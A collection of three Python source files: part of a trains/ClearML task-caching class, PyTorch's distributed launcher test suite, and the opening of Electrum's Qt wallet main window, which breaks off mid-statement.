name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
id=task_ids,
project=[project.id] if project else kwargs.pop('project', None),
name=task_name if task_name else None,
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(
cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may not exist in environment changes
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It is not timed out i.e it was last use in the previous 24 hours.
2. It's name, project and type match the data in the server, so not
to override user changes made by using the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True, if the task is relevant for reuse. False, if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
if task is None:
return False
project_name = None
if task.project:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
if task_data.get('type') and \
task_data.get('type') not in (cls.TaskTypes.training, cls.TaskTypes.testing) and \
not Session.check_min_api_version(2.8):
print('WARNING: Changing task type to "{}" : '
'trains-server does not support task type "{}", '
'please upgrade trains-server.'.format(cls.TaskTypes.training, task_data['type'].value))
task_data['type'] = cls.TaskTypes.training
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
run_test.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import runpy
import shutil
import subprocess
import sys
import tempfile
import unittest
import uuid
from contextlib import closing
from unittest import mock
from unittest.mock import Mock, patch
import torch.distributed.run as launch
from torch.distributed.elastic.agent.server.api import RunResult, WorkerState
from torch.distributed.elastic.multiprocessing.errors import ChildFailedError
from torch.distributed.elastic.rendezvous.etcd_server import EtcdServer
from torch.distributed.elastic.utils import get_socket_with_port
from torch.distributed.elastic.utils.distributed import get_free_port
from torch.testing._internal.common_utils import (
TEST_WITH_ASAN,
TEST_WITH_TSAN,
)
def launch_in_proc(args):
launch.main(args)
def path(script):
return os.path.join(os.path.dirname(__file__), script)
def get_child_pids(pid):
pgrep = subprocess.Popen(args=f"pgrep -P {pid}", shell=True, stdout=subprocess.PIPE)
pgrep.wait()
out = pgrep.stdout.read().decode("utf-8").rstrip().split("\n")
pids = []
for pid in out:
if pid:
pids.append(int(pid))
return pids
def pid_exists(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
class MockException(Exception):
pass
class ElasticLaunchTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
cls._etcd_endpoint = cls._etcd_server.get_endpoint()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
def setUp(self):
self.test_dir = tempfile.mkdtemp()
# remove any lingering environment variables
for env in os.environ.keys():
if env.startswith("PET_"):
del os.environ[env]
# set a sentinel env var on the parent proc
# this should be present on the child and gets
# asserted in ``bin/test_script.py``
os.environ["TEST_SENTINEL_PARENT"] = "FOOBAR"
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_launch_user_script_python(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_launch_user_script_python_caffe2_bc(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
sock = get_socket_with_port()
with closing(sock):
master_port = sock.getsockname()[1]
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
"--master_addr=localhost",
f"--master_port={master_port}",
"--node_rank=0",
"--use_env",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_user_script_bash(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_user_script_default_nproc(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
world_size = 1
args = [
f"--nnodes={nnodes}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
launch.main(args + ["--module"] + script_args)
launch.main(args + script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_with_env_vars(self):
run_id = str(uuid.uuid4().int)
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
os.environ["PET_NNODES"] = str(nnodes)
os.environ["PET_NPROC_PER_NODE"] = str(nproc_per_node)
os.environ["PET_RDZV_BACKEND"] = "etcd"
os.environ["PET_RDZV_ENDPOINT"] = self._etcd_endpoint
os.environ["PET_RDZV_ID"] = run_id
os.environ["PET_MONITOR_INTERVAL"] = "1"
os.environ["PET_START_METHOD"] = "fork"
os.environ["PET_NO_PYTHON"] = "1"
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
with self.assertRaises(ValueError):
# --no_python cannot be used with --module
os.environ["PET_MODULE"] = "1"
launch.main(script_args)
os.environ["PET_MODULE"] = "0"
launch.main(script_args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def _test_nproc_launch_configuration(self, nproc_type, expected_number):
run_id = str(uuid.uuid4().int)
nnodes = 1
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_type}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
"--no_python",
]
script_args = [path("bin/test_script.sh"), f"{self.test_dir}"]
launch.main(args + script_args)
world_size = nnodes * expected_number
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_auto_configurations(self):
self._test_nproc_launch_configuration("auto", os.cpu_count())
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_number_configurations(self):
self._test_nproc_launch_configuration("4", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_nproc_launch_unknown_configurations(self):
with self.assertRaises(ValueError):
self._test_nproc_launch_configuration("unknown", 4)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@patch("torch.cuda.is_available", return_value=True)
@patch("torch.cuda.device_count", return_value=3)
def test_nproc_gpu_launch_configurations(self, _mock1, _mock2):
self._test_nproc_launch_configuration("auto", 3)
self._test_nproc_launch_configuration("gpu", 3)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
# we are only launching 1 node (even though max = 2)
world_size = nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@mock.patch("torch.distributed.elastic.events.record")
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_worker_raise_exception(self, record_mock):
"""
Asserts that when the worker program fails and lancher raieses exception
to indicate that worker process failed
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
"--fail",
]
with self.assertRaises(ChildFailedError):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
@mock.patch(
"torch.distributed.elastic.agent.server.local_elastic_agent.LocalElasticAgent.run"
)
@mock.patch("torch.distributed.elastic.events.record")
def test_launch_elastic_agent_raise_exception(self, record_mock, mock_agent_run):
"""
Asserts that when the agent raises an exception
the launcher re-raises the original exception
"""
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--max_restarts=0",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
mock_agent_run.side_effect = MockException
with self.assertRaises(MockException):
launch.main(args)
record_mock.assert_called_once()
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_standalone(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--standalone",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_run_path(self):
nnodes = 1
nproc_per_node = 4
world_size = nnodes * nproc_per_node
args = [
"--run_path",
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
launch.main(args)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
@unittest.skipIf(TEST_WITH_ASAN or TEST_WITH_TSAN, "test incompatible with tsan")
def test_launch_elastic_multiple_agents(self):
run_id = str(uuid.uuid4().int)
min_nodes = 1
max_nodes = 2
nproc_per_node = 4
nnodes = 2
world_size = nnodes * nproc_per_node
args = [
f"--nnodes={min_nodes}:{max_nodes}",
f"--nproc_per_node={nproc_per_node}",
"--rdzv_backend=etcd",
f"--rdzv_endpoint={self._etcd_endpoint}",
f"--rdzv_id={run_id}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
procs = []
for _ in range(nnodes - 1):
p = mp.Process(target=launch.main, args=[args])
procs.append(p)
p.start()
launch.main(args)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
# make sure all the workers ran
# each worker touches a file with its global rank as the name
self.assertSetEqual(
{str(i) for i in range(world_size)}, set(os.listdir(self.test_dir))
)
def test_min_max_nodes_parse(self):
min_nodes, max_nodes = launch.parse_min_max_nnodes("1")
self.assertTrue(min_nodes, max_nodes)
self.assertTrue(1, min_nodes)
min_nodes, max_nodes = launch.parse_min_max_nnodes("2:20")
self.assertTrue(2, min_nodes)
self.assertTrue(20, max_nodes)
with self.assertRaises(RuntimeError):
launch.parse_min_max_nnodes("2:20:30")
@patch("torch.distributed.launcher.api.LocalElasticAgent")
def test_launch_shutdown(self, agent_mock_cls):
nnodes = 1
nproc_per_node = 4
args = [
f"--nnodes={nnodes}",
f"--nproc_per_node={nproc_per_node}",
"--monitor_interval=1",
"--start_method=fork",
path("bin/test_script.py"),
f"--touch_file_dir={self.test_dir}",
]
agent_mock = Mock()
agent_mock.run.return_value = RunResult(WorkerState.SUCCEEDED)
agent_mock_cls.return_value = agent_mock
rdzv_handler_mock = Mock()
with patch(
"torch.distributed.elastic.rendezvous.registry.get_rendezvous_handler"
) as param_mock:
param_mock.return_value = rdzv_handler_mock
launch.main(args)
rdzv_handler_mock.shutdown.assert_called_once()
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_is_torchelastic_launched(self):
# launch test script with torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns True
out_file = f"{os.path.join(self.test_dir, 'out')}"
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=1",
"--monitor_interval=1",
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
]
)
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("True", is_torchelastic_launched)
def test_is_not_torchelastic_launched(self):
# launch test script without torchelastic and validate that
# torch.distributed.is_torchelastic_launched() returns False
out_file = f"{os.path.join(self.test_dir, 'out')}"
# need to run the script with runpy in the same interpreter
# as the test because otherwise (depending on the environment)
# it will not find torch as a dependency
with patch.object(
sys,
"argv",
[
path("bin/test_script_is_torchelastic_launched.py"),
f"--out_file={out_file}",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
with open(out_file, "r") as fp:
is_torchelastic_launched = fp.readline()
self.assertEqual("False", is_torchelastic_launched)
def test_init_method_tcp(self):
port = get_free_port()
with patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
"--rank=0",
"--world_size=1",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_tcp_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
f"--init_method=tcp://localhost:{port}",
]
)
# nothing to validate, just make sure it runs
def test_init_method_env(self):
port = get_free_port()
with patch.dict(
os.environ,
{
"RANK": "0",
"WORLD_SIZE": "1",
"MASTER_ADDR": "localhost",
"MASTER_PORT": str(port),
},
), patch.object(
sys,
"argv",
[
path("bin/test_script_init_method.py"),
"--init_method=env://",
],
):
runpy.run_path(sys.argv[0], run_name="__main__")
# nothing to validate, just make sure it runs
@sandcastle_skip_if(TEST_WITH_DEV_DBG_ASAN, "test incompatible with dev/dbg asan")
def test_init_method_env_with_torchelastic(self):
port = get_free_port()
launch.main(
[
"--run_path",
"--nnodes=1",
"--nproc_per_node=4",
"--master_addr=localhost",
f"--master_port={port}",
"--monitor_interval=1",
path("bin/test_script_init_method.py"),
"--init_method=env://",
]
)
# nothing to validate, just make sure it runs
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
